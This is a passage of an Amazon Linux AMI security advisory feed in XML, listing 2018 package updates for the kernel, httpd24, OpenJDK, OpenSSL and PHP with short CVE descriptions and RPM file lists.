</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3615" title="" id="CVE-2018-3615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3620" title="" id="CVE-2018-3620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3646" title="" id="CVE-2018-3646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5391" title="" id="CVE-2018-5391" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.62-65.117.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.62-65.117.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.62" release="65.117.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.62-65.117.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1062</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1062: medium priority package update for httpd24</title><issued date="2018-08-22 18:56:00" /><updated date="2018-08-23 17:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8011:
By specially crafting HTTP requests, the mod_md challenge handler would dereference a NULL pointer and cause the child process to segfault. This could be used to DoS the server. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.33).
1605052:
CVE-2018-8011 httpd: mod_md: NULL pointer dereference causing httpd child process crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8011" title="" id="CVE-2018-8011" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.34" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.34" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.34" release="1.82.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.34-1.82.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.34" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.34-1.82.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.34" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.34" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.34-1.82.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.34" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.34-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1064</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1064: medium priority package update for java-1.7.0-openjdk</title><issued date="2018-08-22 18:58:00" /><updated date="2018-08-23 17:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2952:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 6u191, 7u181, 8u172 and 10.0.1; Java SE Embedded: 8u171; JRockit: R28.3.18. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1600925:
CVE-2018-2952 OpenJDK: insufficient index validation in PatternSyntaxException getMessage() (Concurrency, 8199547)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2952" title="" id="CVE-2018-2952" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.191-2.6.15.4.82.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.191-2.6.15.4.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.191" release="2.6.15.4.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.191-2.6.15.4.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1065</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1065: medium priority package update for openssl</title><issued date="2018-08-22 18:59:00" /><updated date="2018-08-23 17:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
CVE-2018-0733:
Because of an implementation bug the PA-RISC CRYPTO_memcmp function is effectively reduced to only comparing the least significant bit of each byte. This allows an attacker to forge messages that would be considered as authenticated in an amount of tries lower than that guaranteed by the security claims of the scheme. The module can only be compiled by the HP-UX assembler, so that only HP-UX PA-RISC targets are affected. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g).
1561260:
CVE-2018-0733 openssl: Implementation bug in PA-RISC CRYPTO_memcmp function allows attackers to forge authenticated messages in a reduced number of attempts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0733" title="" id="CVE-2018-0733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-12.110.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-12.110.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.110.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-12.110.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1066</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1066: low priority package update for php56 php70 php71</title><issued date="2018-08-22 19:30:00" /><updated date="2018-08-23 17:33:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14883:
An issue was discovered in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8. An Integer Overflow leads to a heap-based buffer over-read in exif_thumbnail_extract of exif.c.
1609637:
CVE-2018-14883 php: exif: integer overflow leading to out-of-bound buffer read in exif_thumbnail_extract()
CVE-2018-14851:
exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.
1609642:
CVE-2018-14851 php: exif: buffer over-read in exif_process_IFD_in_MAKERNOTE()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14851" title="" id="CVE-2018-14851" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14883" title="" id="CVE-2018-14883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-ldap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.37" release="1.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.37-1.139.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.37" release="1.139.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.37-1.139.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" 